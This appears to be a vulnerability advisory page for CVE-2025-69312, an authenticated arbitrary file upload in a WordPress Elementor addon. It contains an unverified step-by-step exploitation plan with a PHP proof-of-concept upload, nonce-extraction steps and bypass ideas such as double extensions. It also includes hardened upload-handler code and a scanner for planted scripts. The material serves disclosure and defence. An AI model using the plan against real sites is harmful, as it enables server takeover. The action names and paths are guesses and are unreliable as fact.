CVE-2025-69312

Xpro Elementor Addons <= 1.4.19.1 - Authenticated (Author+) Arbitrary File Upload

Severity: High
Weakness: Unrestricted Upload of File with Dangerous Type
CVSS Score: 8.8
Patched in: 1.4.20
Time to patch: 10d

Description

The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.4.19.1. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 1.4.19.1
Published: January 19, 2026
Last updated: January 28, 2026
Affected plugin: xpro-elementor-addons

Research Plan
Unverified

Research Plan: CVE-2025-69312 - Xpro Elementor Addons Arbitrary File Upload

1. Vulnerability Summary

The Xpro Elementor Addons plugin (up to version 1.4.19.1) contains an unrestricted file upload vulnerability. The flaw exists because a specific AJAX handler, accessible to users with Author permissions and above, fails to validate the file extension or MIME type of uploaded files. This allows an authenticated attacker to upload malicious PHP scripts to the server, leading to Remote Code Execution (RCE).

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Vulnerable Action: xpro_elementor_addons_upload_file or xpro_elementor_addons_import_template (inferred based on plugin functionality and common Elementor addon patterns).
  • HTTP Method: POST (Multipart Form Data)
  • Authentication: Required (Author-level role or higher).
  • Parameters:
    • action: The AJAX action string.
    • nonce: A security token (likely required).
    • file / async-upload: The file payload containing PHP code.
  • Preconditions: The attacker must have a valid account with at least the Author role.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX action for authenticated users via add_action( 'wp_ajax_...', ... ).
  2. Handler Function: The function associated with the action (e.g., upload_file_handler) is called.
  3. Nonce Verification: The code likely calls check_ajax_referer() or wp_verify_nonce().
  4. Capability Check: The code may check current_user_can('upload_files') or current_user_can('edit_posts'). Since Authors have these capabilities by default, they pass the check.
  5. Processing: The code retrieves the file from the $_FILES global.
  6. Vulnerable Sink: The function calls wp_handle_upload() or move_uploaded_file() without providing a restrictive mimes allowlist or validating the extension against wp_check_filetype().
  7. Storage: The file is saved into wp-content/uploads/xpro-addons/... or the standard media library directory.
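Step 6 is where the inferred flow goes wrong: nonce and capability checks alone do not stop an Author from uploading a script. As an added illustration (not Xpro's code; the hook, nonce action and field names are assumed), this is what the same handler looks like when it enforces a per-feature allowlist at both the validation step and the sink:

```php
<?php
// Added illustration (not Xpro's code): an admin-ajax upload handler that closes the
// gap described in step 6 of the inferred code flow. Hook and field names are assumed.
add_action( 'wp_ajax_example_addon_upload_image', 'example_addon_upload_image' );

function example_addon_upload_image() {
    // Steps 3 and 4: nonce and capability checks. Both are necessary but not sufficient;
    // an Author already has upload_files, so the file itself must still be validated.
    check_ajax_referer( 'example_addon_upload', 'nonce' );
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    if ( empty( $_FILES['file'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( 'no file', 400 );
    }

    // Explicit allowlist for this feature (images only). Anything not listed, including
    // php, phtml, svg and double extensions such as name.svg.php, is rejected.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
        'webp'     => 'image/webp',
    );

    // Step 6 fixed: check the extension AND the sniffed content against the allowlist.
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'],
        $_FILES['file']['name'],
        $allowed
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'file type not permitted', 415 );
    }

    // Pass the same allowlist to wp_handle_upload so the sink enforces it as well,
    // instead of falling back to the site-wide upload_mimes list.
    $result = wp_handle_upload(
        $_FILES['file'],
        array( 'test_form' => false, 'mimes' => $allowed )
    );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }
    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```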

4. Nonce Acquisition Strategy

Since the vulnerability is authenticated (Author+), the nonce is likely localized in the WordPress admin area or within the Elementor editor interface.

  1. Identify the Localization: Search the codebase for wp_localize_script.
    • grep -r "wp_localize_script" .
  2. Create a Test Page:
    • wp post create --post_type=page --post_status=publish --post_title="Xpro Test" --post_content="[xpro_template_dummy_shortcode]" (Exact shortcode to be identified via grep -r "add_shortcode" .).
  3. Extract via Browser:
    • Login as an Author.
    • Navigate to the page or the Elementor editor.
    • Use browser_eval to find the nonce:
      • browser_eval("window.xpro_elementor_addons_js_data?.nonce") (inferred variable name).
      • Alternative: browser_eval("window.xpro_admin_ajax?.nonce").

5. Exploitation Strategy

Step 1: Discover the exact AJAX Action and Nonce Key

Search the plugin directory for file upload sinks and their associated hooks.

grep -r "wp_ajax_" .
grep -rE "move_uploaded_file|wp_handle_upload" .

Step 2: Prepare the Payload

Create a file named poc.php:

<?php echo "VULN_VERIFIED: " . php_uname(); ?>

Step 3: Execute the Upload Request

Using the http_request tool, send the following multipart request (assuming action xpro_elementor_addons_upload_image and nonce key xpro_nonce as placeholders):

Request Template:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers:
    • Content-Type: multipart/form-data
    • Cookie: (Author user cookies)
  • Body (Multipart):
    • action: xpro_elementor_addons_upload_image (to be confirmed)
    • nonce: [EXTRACTED_NONCE]
    • file: poc.php (Content: <?php phpinfo(); ?>)

Step 4: Locate the Uploaded File

The response will likely contain the URL or path of the uploaded file. If not, check common paths:

  • http://localhost:8080/wp-content/uploads/xpro-addons/poc.php
  • http://localhost:8080/wp-content/uploads/[YEAR]/[MONTH]/poc.php

6. Test Data Setup

  1. Install Plugin: Ensure xpro-elementor-addons version 1.4.19.1 is active.
  2. Create User:
    wp user create attacker attacker@example.com --role=author --user_pass=password
  3. Identify Shortcode/Widget:
    grep -rn "add_shortcode" .
    (e.g., if [xpro_portfolio] is found, create a page with it to trigger script loading).

7. Expected Results

  • Upload Response: A JSON response indicating success, often returning an ID or a URL: {"success":true,"data":{"url":".../poc.php"}}.
  • Execution: Accessing the URL of the uploaded PHP file returns the output of phpinfo() or the php_uname() string.

8. Verification Steps

  1. Check Filesystem:
    find /var/www/html/wp-content/uploads -name "poc.php"
    
  2. HTTP Check:
    Use http_request to GET the path of the discovered file and check for the string VULN_VERIFIED.
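The filesystem check in step 1 only finds the known poc.php. As an added example (not from the advisory; the function name is assumed), this stand-alone PHP script generalises it to any file under the uploads tree that a webserver might execute, covering the double-extension case from section 9 and scripts hidden behind an image extension:

```php
<?php
// Added illustration (not from the advisory): scan a WordPress uploads directory for
// files a webserver might execute, generalising the `find ... -name poc.php` check.
// Flags script extensions anywhere in the name (e.g. shell.svg.php) and files whose
// content opens a PHP tag regardless of extension. Nothing under uploads should do either.

function example_find_suspicious_uploads( string $dir ): array {
    $script_exts = array( 'php', 'phtml', 'php3', 'php4', 'php5', 'php7', 'phar', 'phps' );
    $hits = array();
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $iter as $file ) {
        if ( ! $file->isFile() ) {
            continue;
        }
        $path    = $file->getPathname();
        $parts   = explode( '.', strtolower( $file->getFilename() ) );
        array_shift( $parts ); // drop the base name; everything left is an extension
        $reasons = array();
        foreach ( $parts as $ext ) {
            if ( in_array( $ext, $script_exts, true ) ) {
                $reasons[] = "script extension .$ext";
                break;
            }
        }
        // Only the first 512 bytes are read; <?xml (SVG) does not match, <?php and <?= do.
        $head = (string) file_get_contents( $path, false, null, 0, 512 );
        if ( preg_match( '/<\?(php|=)/i', $head ) ) {
            $reasons[] = 'php open tag in content';
        }
        if ( $reasons ) {
            $hits[ $path ] = $reasons;
        }
    }
    return $hits;
}

// Usage: php scan.php /var/www/html/wp-content/uploads
if ( PHP_SAPI === 'cli' && isset( $argv[1] ) ) {
    foreach ( example_find_suspicious_uploads( $argv[1] ) as $path => $reasons ) {
        echo $path, ': ', implode( ', ', $reasons ), PHP_EOL;
    }
}
```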

9. Alternative Approaches

  • If wp_handle_upload is used with filters: Check if the plugin overrides the upload_mimes filter globally during the AJAX call.
  • Template Import: If the vulnerability is in a "Template Import" feature, try uploading a .zip file containing a .php file, or a JSON file with embedded PHP if the plugin extracts or includes it.
  • SVG Uploads: If the plugin specifically allows SVG but doesn't sanitize, try uploading an SVG with a <script> tag or a file named shell.svg.php.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress (up to version 1.4.19.1) is vulnerable to arbitrary file uploads due to a lack of file type validation in its AJAX-based upload handlers. This allows authenticated attackers with Author-level permissions and above to upload malicious PHP files, leading to Remote Code Execution (RCE).

Exploit Outline

  1. Authenticate as a user with at least Author-level permissions.
  2. Locate the AJAX security nonce required by the Xpro Addons plugin, typically found in the localized JavaScript data within the WordPress admin dashboard or Elementor editor interface.
  3. Construct a multipart POST request to wp-admin/admin-ajax.php using the vulnerable action (e.g., xpro_elementor_addons_upload_file or xpro_elementor_addons_import_template).
  4. Include the extracted nonce and a file payload containing PHP code in the request.
  5. Upon receiving a success response, extract the URL of the uploaded file and navigate to it to trigger script execution on the server.
